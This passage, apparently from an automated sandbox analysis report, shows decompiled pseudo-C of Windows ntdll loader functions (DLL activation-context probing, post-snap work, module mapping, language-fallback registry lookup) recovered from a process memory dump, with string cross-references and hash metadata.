                                      							}
                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                      						}
                                      						goto L9;
                                      					}
                                      					if(_t49 != 0xc000008a) {
                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                      							if(_t49 != 0xc00000bb) {
                                      								goto L8;
                                      							}
                                      						}
                                      					}
                                      					if(( *0x2f55780 & 0x00000005) != 0) {
                                      						_push(_t49);
                                      						E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                      						_t53 = _t53 + 0x1c;
                                      					}
                                      					_t49 = 0;
                                      					goto L8;
                                      				} else {
                                      					goto L9;
                                      				}
                                      			}





















                                      Strings
                                      • LdrpFindDllActivationContext, xrefs: 02ED9331, 02ED935D
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 02ED933B, 02ED9367
                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02ED932A
                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 02ED9357
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-3779518884
                                      • Opcode ID: e76eb8e3ec51f8457548135e6bce4ecf85029a664950a78d73e23b418e6d477c
                                      • Instruction ID: d7ecfe5ead5414674cf163325ea44df1c5b9404769c059f38b511f299b967e36
                                      • Opcode Fuzzy Hash: e76eb8e3ec51f8457548135e6bce4ecf85029a664950a78d73e23b418e6d477c
                                      • Instruction Fuzzy Hash: DA410832AC03199FEF34EA14DC68B75B76DAB0624CF0AF56BE905571B1E7706C80C681
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E02E78794(void* __ecx) {
                                      				signed int _v0;
                                      				char _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v40;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr* _t77;
                                      				signed int _t80;
                                      				signed char _t81;
                                      				signed int _t87;
                                      				signed int _t91;
                                      				void* _t92;
                                      				void* _t94;
                                      				signed int _t95;
                                      				signed int _t103;
                                      				signed int _t105;
                                      				signed int _t110;
                                      				signed int _t118;
                                      				intOrPtr* _t121;
                                      				intOrPtr _t122;
                                      				signed int _t125;
                                      				signed int _t129;
                                      				signed int _t131;
                                      				signed int _t134;
                                      				signed int _t136;
                                      				signed int _t143;
                                      				signed int* _t147;
                                      				signed int _t151;
                                      				void* _t153;
                                      				signed int* _t157;
                                      				signed int _t159;
                                      				signed int _t161;
                                      				signed int _t166;
                                      				signed int _t168;
                                      
                                      				_push(__ecx);
                                      				_t153 = __ecx;
                                      				_t159 = 0;
                                      				_t121 = __ecx + 0x3c;
                                      				if( *_t121 == 0) {
                                      					L2:
                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                      							L6:
                                      							if(E02E7934A() != 0) {
                                      								_t159 = E02EEA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                      								__eflags = _t159;
                                      								if(_t159 < 0) {
                                      									_t81 =  *0x2f55780; // 0x0
                                      									__eflags = _t81 & 0x00000003;
                                      									if((_t81 & 0x00000003) != 0) {
                                      										_push(_t159);
                                      										E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                      										_t81 =  *0x2f55780; // 0x0
                                      									}
                                      									__eflags = _t81 & 0x00000010;
                                      									if((_t81 & 0x00000010) != 0) {
                                      										asm("int3");
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t159 = E02E7849B(0, _t122, _t153, _t159, _t180);
                                      							if(_t159 >= 0) {
                                      								goto L6;
                                      							}
                                      						}
                                      						_t80 = _t159;
                                      						goto L8;
                                      					} else {
                                      						_t125 = 0x13;
                                      						asm("int 0x29");
                                      						_push(0);
                                      						_push(_t159);
                                      						_t161 = _t125;
                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                      						_t143 = 0;
                                      						_v40 = _t161;
                                      						_t118 = 0;
                                      						_push(_t153);
                                      						__eflags = _t87;
                                      						if(_t87 != 0) {
                                      							_t118 = _t87 + 0x5d8;
                                      							__eflags = _t118;
                                      							if(_t118 == 0) {
                                      								L46:
                                      								_t118 = 0;
                                      							} else {
                                      								__eflags =  *(_t118 + 0x30);
                                      								if( *(_t118 + 0x30) == 0) {
                                      									goto L46;
                                      								}
                                      							}
                                      						}
                                      						_v32 = 0;
                                      						_v28 = 0;
                                      						_v16 = 0;
                                      						_v20 = 0;
                                      						_v12 = 0;
                                      						__eflags = _t118;
                                      						if(_t118 != 0) {
                                      							__eflags = _t161;
                                      							if(_t161 != 0) {
                                      								__eflags =  *(_t118 + 8);
                                      								if( *(_t118 + 8) == 0) {
                                      									L22:
                                      									_t143 = 1;
                                      									__eflags = 1;
                                      								} else {
                                      									_t19 = _t118 + 0x40; // 0x40
                                      									_t156 = _t19;
                                      									E02E78999(_t19,  &_v16);
                                      									__eflags = _v0;
                                      									if(_v0 != 0) {
                                      										__eflags = _v0 - 1;
                                      										if(_v0 != 1) {
                                      											goto L22;
                                      										} else {
                                      											_t128 =  *(_t161 + 0x64);
                                      											__eflags =  *(_t161 + 0x64);
                                      											if( *(_t161 + 0x64) == 0) {
                                      												goto L22;
                                      											} else {
                                      												E02E78999(_t128,  &_v12);
                                      												_t147 = _v12;
                                      												_t91 = 0;
                                      												__eflags = 0;
                                      												_t129 =  *_t147;
                                      												while(1) {
                                      													__eflags =  *((intOrPtr*)(0x2f55c60 + _t91 * 8)) - _t129;
                                      													if( *((intOrPtr*)(0x2f55c60 + _t91 * 8)) == _t129) {
                                      														break;
                                      													}
                                      													_t91 = _t91 + 1;
                                      													__eflags = _t91 - 5;
                                      													if(_t91 < 5) {
                                      														continue;
                                      													} else {
                                      														_t131 = 0;
                                      														__eflags = 0;
                                      													}
                                      													L37:
                                      													__eflags = _t131;
                                      													if(_t131 != 0) {
                                      														goto L22;
                                      													} else {
                                      														__eflags = _v16 - _t147;
                                      														if(_v16 != _t147) {
                                      															goto L22;
                                      														} else {
                                      															E02E82280(_t92, 0x2f586cc);
                                      															_t94 = E02F39DFB( &_v20);
                                      															__eflags = _t94 - 1;
                                      															if(_t94 != 1) {
                                      															}
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															 *_t118 =  *_t118 + 1;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															_t95 = E02E961A0( &_v32);
                                      															__eflags = _t95;
                                      															if(_t95 != 0) {
                                      																__eflags = _v32 | _v28;
                                      																if((_v32 | _v28) != 0) {
                                      																	_t71 = _t118 + 0x40; // 0x3f
                                      																	_t134 = _t71;
                                      																	goto L55;
                                      																}
                                      															}
                                      															goto L30;
                                      														}
                                      													}
                                      													goto L56;
                                      												}
                                      												_t92 = 0x2f55c64 + _t91 * 8;
                                      												asm("lock xadd [eax], ecx");
                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                      												goto L37;
                                      											}
                                      										}
                                      										goto L56;
                                      									} else {
                                      										_t143 = E02E78A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                      										__eflags = _t143;
                                      										if(_t143 != 0) {
                                      											_t157 = _v12;
                                      											_t103 = 0;
                                      											__eflags = 0;
                                      											_t136 =  &(_t157[1]);
                                      											 *(_t161 + 0x64) = _t136;
                                      											_t151 =  *_t157;
                                      											_v20 = _t136;
                                      											while(1) {
                                      												__eflags =  *((intOrPtr*)(0x2f55c60 + _t103 * 8)) - _t151;
                                      												if( *((intOrPtr*)(0x2f55c60 + _t103 * 8)) == _t151) {
                                      													break;
                                      												}
                                      												_t103 = _t103 + 1;
                                      												__eflags = _t103 - 5;
                                      												if(_t103 < 5) {
                                      													continue;
                                      												}
                                      												L21:
                                      												_t105 = E02EAF380(_t136, 0x2e41184, 0x10);
                                      												__eflags = _t105;
                                      												if(_t105 != 0) {
                                      													__eflags =  *_t157 -  *_v16;
                                      													if( *_t157 >=  *_v16) {
                                      														goto L22;
                                      													} else {
                                      														asm("cdq");
                                      														_t166 = _t157[5] & 0x0000ffff;
                                      														_t108 = _t157[5] & 0x0000ffff;
                                      														asm("cdq");
                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                      														if(__eflags > 0) {
                                      															L29:
                                      															E02E82280(_t108, 0x2f586cc);
                                      															 *_t118 =  *_t118 + 1;
                                      															_t42 = _t118 + 0x40; // 0x3f
                                      															_t156 = _t42;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															asm("movsd");
                                      															_t110 = E02E961A0( &_v32);
                                      															__eflags = _t110;
                                      															if(_t110 != 0) {
                                      																__eflags = _v32 | _v28;
                                      																if((_v32 | _v28) != 0) {
                                      																	_t134 = _v20;
                                      																	L55:
                                      																	E02F39D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                      																}
                                      															}
                                      															L30:
                                      															 *_t118 =  *_t118 + 1;
                                      															asm("adc dword [ebx+0x4], 0x0");
                                      															E02E7FFB0(_t118, _t156, 0x2f586cc);
                                      															goto L22;
                                      														} else {
                                      															if(__eflags < 0) {
                                      																goto L22;
                                      															} else {
                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                      																	goto L22;
                                      																} else {
                                      																	goto L29;
                                      																}
                                      															}
                                      														}
                                      													}
                                      													goto L56;
                                      												}
                                      												goto L22;
                                      											}
                                      											asm("lock inc dword [eax]");
                                      											goto L21;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      						return _t143;
                                      					}
                                      				} else {
                                      					_push( &_v8);
                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                      					_push(__ecx + 0x40);
                                      					_push(_t121);
                                      					_push(0xffffffff);
                                      					_t80 = E02EA9A00();
                                      					_t159 = _t80;
                                      					if(_t159 < 0) {
                                      						L8:
                                      						return _t80;
                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      				L56:
                                      			}

                                      Strings
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 02EC9C28
                                      • LdrpDoPostSnapWork, xrefs: 02EC9C1E
                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02EC9C18
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-1948996284
                                      • Opcode ID: 91b092bf5eeae5118344521e968bb0e5581d725c9287b794b850558b8c193644
                                      • Instruction ID: 46df25e4623cd793bb57819d02e83521f2394b02202d5d12c3ab6de302db6d71
                                      • Opcode Fuzzy Hash: 91b092bf5eeae5118344521e968bb0e5581d725c9287b794b850558b8c193644
                                      • Instruction Fuzzy Hash: A0913A31A80219DFEF18DF58C488ABAB7B6FF54318B54E069ED06AB241D730ED01DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E02E77E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				signed int _t73;
                                      				void* _t77;
                                      				char* _t82;
                                      				char* _t87;
                                      				signed char* _t97;
                                      				signed char _t102;
                                      				intOrPtr _t107;
                                      				signed char* _t108;
                                      				intOrPtr _t112;
                                      				intOrPtr _t124;
                                      				intOrPtr _t125;
                                      				intOrPtr _t126;
                                      
                                      				_t107 = __edx;
                                      				_v12 = __ecx;
                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                      				_t124 = 0;
                                      				_v20 = __edx;
                                      				if(E02E7CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                      					_t112 = _v8;
                                      				} else {
                                      					_t112 = 0;
                                      					_v8 = 0;
                                      				}
                                      				if(_t112 != 0) {
                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                      						_t124 = 0xc000007b;
                                      						goto L8;
                                      					}
                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                      					 *(_t125 + 0x34) = _t73;
                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                      						goto L3;
                                      					}
                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                      					_t124 = E02E6C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                      					if(_t124 < 0) {
                                      						goto L8;
                                      					} else {
                                      						goto L3;
                                      					}
                                      				} else {
                                      					L3:
                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                      						L8:
                                      						return _t124;
                                      					}
                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                      							goto L5;
                                      						}
                                      						_t102 =  *0x2f55780; // 0x0
                                      						if((_t102 & 0x00000003) != 0) {
                                      							E02EE5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                      							_t102 =  *0x2f55780; // 0x0
                                      						}
                                      						if((_t102 & 0x00000010) != 0) {
                                      							asm("int3");
                                      						}
                                      						_t124 = 0xc0000428;
                                      						goto L8;
                                      					}
                                      					L5:
                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                      						goto L8;
                                      					}
                                      					_t77 = _a4 - 0x40000003;
                                      					if(_t77 == 0 || _t77 == 0x33) {
                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                      						if(E02E87D50() != 0) {
                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      						} else {
                                      							_t82 = 0x7ffe0384;
                                      						}
                                      						_t108 = 0x7ffe0385;
                                      						if( *_t82 != 0) {
                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                      								if(E02E87D50() == 0) {
                                      									_t97 = 0x7ffe0385;
                                      								} else {
                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      								}
                                      								if(( *_t97 & 0x00000020) != 0) {
                                      									E02EE7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                      								}
                                      							}
                                      						}
                                      						if(_a4 != 0x40000003) {
                                      							L14:
                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                      							if(E02E87D50() != 0) {
                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      							} else {
                                      								_t87 = 0x7ffe0384;
                                      							}
                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                      								if(E02E87D50() != 0) {
                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      								}
                                      								if(( *_t108 & 0x00000020) != 0) {
                                      									E02EE7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                      								}
                                      							}
                                      							goto L8;
                                      						} else {
                                      							_v16 = _t125 + 0x24;
                                      							_t124 = E02E9A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                      							if(_t124 < 0) {
                                      								E02E6B1E1(_t124, 0x1490, 0, _v16);
                                      								goto L8;
                                      							}
                                      							goto L14;
                                      						}
                                      					} else {
                                      						goto L8;
                                      					}
                                      				}
                                      			}

                                      Strings
                                      • minkernel\ntdll\ldrmap.c, xrefs: 02EC98A2
                                      • LdrpCompleteMapModule, xrefs: 02EC9898
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 02EC9891
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: 8552ca1f88205a66dbda155f50210acc3016a12b9ba764d8e72cba44d9a65d6a
                                      • Instruction ID: 5e05bf576fb2444ed4b8400aa38b7b55267e8c3552e660b048a54c506938e822
                                      • Opcode Fuzzy Hash: 8552ca1f88205a66dbda155f50210acc3016a12b9ba764d8e72cba44d9a65d6a
                                      • Instruction Fuzzy Hash: A45115316847459BEB25CBA8CA44B7ABBE4FB01318F14A5ADE8519B3E2D730ED01CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E02E6E620(void* __ecx, short* __edx, short* _a4) {
                                      				char _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				char* _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v44;
                                      				signed int _v48;
                                      				intOrPtr _v52;
                                      				void* _v56;
                                      				void* _v60;
                                      				char _v64;
                                      				void* _v68;
                                      				void* _v76;
                                      				void* _v84;
                                      				signed int _t59;
                                      				signed int _t74;
                                      				signed short* _t75;
                                      				signed int _t76;
                                      				signed short* _t78;
                                      				signed int _t83;
                                      				short* _t93;
                                      				signed short* _t94;
                                      				short* _t96;
                                      				void* _t97;
                                      				signed int _t99;
                                      				void* _t101;
                                      				void* _t102;
                                      
                                      				_t80 = __ecx;
                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                      				_t96 = __edx;
                                      				_v44 = __edx;
                                      				_t78 = 0;
                                      				_v56 = 0;
                                      				if(__ecx == 0 || __edx == 0) {
                                      					L28:
                                      					_t97 = 0xc000000d;
                                      				} else {
                                      					_t93 = _a4;
                                      					if(_t93 == 0) {
                                      						goto L28;
                                      					}
                                      					_t78 = E02E6F358(__ecx, 0xac);
                                      					if(_t78 == 0) {
                                      						_t97 = 0xc0000017;
                                      						L6:
                                      						if(_v56 != 0) {
                                      							_push(_v56);
                                      							E02EA95D0();
                                      						}
                                      						if(_t78 != 0) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                      						}
                                      						return _t97;
                                      					}
                                      					E02EAFA60(_t78, 0, 0x158);
                                      					_v48 = _v48 & 0x00000000;
                                      					_t102 = _t101 + 0xc;
                                      					 *_t96 = 0;
                                      					 *_t93 = 0;
                                      					E02EABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                      					_v36 = 0x18;
                                      					_v28 =  &_v44;
                                      					_v64 = 0;
                                      					_push( &_v36);
                                      					_push(0x20019);
                                      					_v32 = 0;
                                      					_push( &_v64);
                                      					_v24 = 0x40;
                                      					_v20 = 0;
                                      					_v16 = 0;
                                      					_t97 = E02EA9600();
                                      					if(_t97 < 0) {
                                      						goto L6;
                                      					}
                                      					E02EABB40(0,  &_v36, L"InstallLanguageFallback");
                                      					_push(0);
                                      					_v48 = 4;
                                      					_t97 = L02E6F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                      					if(_t97 >= 0) {
                                      						if(_v52 != 1) {
                                      							L17:
                                      							_t97 = 0xc0000001;
                                      							goto L6;
                                      						}
                                      						_t59 =  *_t78 & 0x0000ffff;
                                      						_t94 = _t78;
                                      						_t83 = _t59;
                                      						if(_t59 == 0) {
                                      							L19:
                                      							if(_t83 == 0) {
                                      								L23:
                                      								E02EABB40(_t83, _t102 + 0x24, _t78);
                                      								if(L02E743C0( &_v48,  &_v64) == 0) {
                                      									goto L17;
                                      								}
                                      								_t84 = _v48;
                                      								 *_v48 = _v56;
                                      								if( *_t94 != 0) {
                                      									E02EABB40(_t84, _t102 + 0x24, _t94);
                                      									if(L02E743C0( &_v48,  &_v64) != 0) {
                                      										 *_a4 = _v56;
                                      									} else {
                                      										_t97 = 0xc0000001;
                                      										 *_v48 = 0;
                                      									}
                                      								}
                                      								goto L6;
                                      							}
                                      							_t83 = _t83 & 0x0000ffff;
                                      							while(_t83 == 0x20) {
                                      								_t94 =  &(_t94[1]);
                                      								_t74 =  *_t94 & 0x0000ffff;
                                      								_t83 = _t74;
                                      								if(_t74 != 0) {
                                      									continue;
                                      								}
                                      								goto L23;
                                      							}
                                      							goto L23;
                                      						} else {
                                      							goto L14;
                                      						}
                                      						while(1) {
                                      							L14:
                                      							_t27 =  &(_t94[1]); // 0x2
                                      							_t75 = _t27;
                                      							if(_t83 == 0x2c) {
                                      								break;
                                      							}
                                      							_t94 = _t75;
                                      							_t76 =  *_t94 & 0x0000ffff;
                                      							_t83 = _t76;
                                      							if(_t76 != 0) {
                                      								continue;
                                      							}
                                      							goto L23;
                                      						}
                                      						 *_t94 = 0;
                                      						_t94 = _t75;
                                      						_t83 =  *_t75 & 0x0000ffff;
                                      						goto L19;
                                      					}
                                      				}
                                      			}

                                      Strings
                                      • @, xrefs: 02E6E6C0
                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02E6E68C
                                      • InstallLanguageFallback, xrefs: 02E6E6DB
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                      • API String ID: 0-1757540487
                                      • Opcode ID: fefc130e8b256071b2c87a8617b9adf0864743fbb05a1d42bebb718a1add7deb
                                      • Instruction ID: 255c6e681519eebd143529f1e8bbbff2e25f1dc6976be4c1b8a29b8748c2b8fe
                                      • Opcode Fuzzy Hash: fefc130e8b256071b2c87a8617b9adf0864743fbb05a1d42bebb718a1add7deb
                                      • Instruction Fuzzy Hash: 6951E3755883019BC710DF64D454BBBB3E8BF88758F54992EF986E7240E730E905CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E02E7D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                      				signed int _v8;
                                      				intOrPtr _v20;
                                      				signed int _v36;
                                      				intOrPtr* _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				signed char _v52;
                                      				signed int _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				signed int _v72;
                                      				signed int _v76;
                                      				intOrPtr _v80;
                                      				signed int _v84;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				signed int _v108;
                                      				signed int _v112;
                                      				signed int _v116;
                                      				intOrPtr _v120;
                                      				signed int _v132;
                                      				char _v140;
                                      				char _v144;
                                      				char _v157;
                                      				signed int _v164;
                                      				signed int _v168;
                                      				signed int _v169;
                                      				intOrPtr _v176;
                                      				signed int _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				signed int _v192;
                                      				signed int _v200;
                                      				signed int _v208;
                                      				intOrPtr* _v212;
                                      				char _v216;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t204;
                                      				signed int _t206;
                                      				void* _t208;
                                      				signed int _t211;
                                      				signed int _t216;
                                      				intOrPtr _t217;
                                      				intOrPtr* _t218;
                                      				signed int _t226;
                                      				signed int _t239;
                                      				signed int* _t247;
                                      				signed int _t249;
                                      				void* _t252;
                                      				signed int _t256;
                                      				signed int _t269;
                                      				signed int _t271;
                                      				signed int _t277;
                                      				intOrPtr _t279;
                                      				intOrPtr _t283;
                                      				signed int _t287;
                                      				signed int _t288;
                                      				void* _t289;
                                      				signed char _t290;
                                      				signed int _t292;
                                      				signed int* _t293;
                                      				unsigned int _t297;
                                      				signed int _t306;
                                      				signed int _t307;
                                      				signed int _t308;
                                      				signed int _t309;
                                      				signed int _t310;
                                      				intOrPtr _t311;
                                      				intOrPtr _t312;
                                      				signed int _t319;
                                      				intOrPtr _t320;
                                      				signed int* _t324;
                                      				signed int _t337;
                                      				signed int _t338;
                                      				signed int _t339;
                                      				intOrPtr* _t340;
                                      				void* _t341;
                                      				signed int _t344;
                                      				signed int _t348;
                                      				signed int _t349;
                                      				signed int _t351;
                                      				intOrPtr _t353;
                                      				void* _t354;
                                      				signed int _t356;
                                      				signed int _t358;
                                      				intOrPtr _t359;
                                      				signed int _t361;
                                      				signed int _t363;
                                      				signed short* _t365;
                                      				void* _t367;
                                      				intOrPtr _t369;
                                      				void* _t370;
                                      				signed int _t371;
                                      				signed int _t372;
                                      				void* _t374;
                                      				signed int _t376;
                                      				void* _t384;
                                      				signed int _t387;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t376;
                                      				_t2 =  &_a20;
                                      				 *_t2 = _a20 & 0x00000001;
                                      				_t287 = _a4;
                                      				_v200 = _a12;
                                      				_t365 = _a8;
                                      				_v212 = _a16;
                                      				_v180 = _a24;
                                      				_v168 = 0;
                                      				_v157 = 0;
                                      				if( *_t2 != 0) {
                                      					__eflags = E02E76600(0x2f552d8);
                                      					if(__eflags == 0) {
                                      						goto L1;
                                      					} else {
                                      						_v188 = 6;
                                      					}
                                      				} else {
                                      					L1:
                                      					_v188 = 9;
                                      				}
                                      				if(_t365 == 0) {
                                      					_v164 = 0;
                                      					goto L5;
                                      				} else {
                                      					_t363 =  *_t365 & 0x0000ffff;
                                      					_t341 = _t363 + 1;
                                      					if((_t365[1] & 0x0000ffff) < _t341) {
                                      						L109:
                                      						__eflags = _t341 - 0x80;
                                      						if(_t341 <= 0x80) {
                                      							_t281 =  &_v140;
                                      							_v164 =  &_v140;
                                      							goto L114;
                                      						} else {
                                      							_t283 =  *0x2f57b9c; // 0x0
                                      							_t281 = L02E84620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                      							_v164 = _t281;
                                      							__eflags = _t281;
                                      							if(_t281 != 0) {
                                      								_v157 = 1;
                                      								L114:
                                      								E02EAF3E0(_t281, _t365[2], _t363);
                                      								_t200 = _v164;
                                      								 *((char*)(_v164 + _t363)) = 0;
                                      								goto L5;
                                      							} else {
                                      								_t204 = 0xc000009a;
                                      								goto L47;
                                      							}
                                      						}
                                      					} else {
                                      						_t200 = _t365[2];
                                      						_v164 = _t200;
                                      						if( *((char*)(_t200 + _t363)) != 0) {
                                      							goto L109;
                                      						} else {
                                      							while(1) {
                                      								L5:
                                      								_t353 = 0;
                                      								_t342 = 0x1000;
                                      								_v176 = 0;
                                      								if(_t287 == 0) {
                                      									break;
                                      								}
                                      								_t384 = _t287 -  *0x2f57b90; // 0x775e0000
                                      								if(_t384 == 0) {
                                      									_t353 =  *0x2f57b8c; // 0x3f29e0
                                      									_v176 = _t353;
                                      									_t63 = _t353 + 0x50; // 0x3f2a90
                                      									_t64 =  *_t63 + 0x20; // 0x9
                                      									_t320 =  *_t64;
                                      									_v184 = _t320;
                                      								} else {
                                      									E02E82280(_t200, 0x2f584d8);
                                      									_t277 =  *0x2f585f4; // 0x3f3228
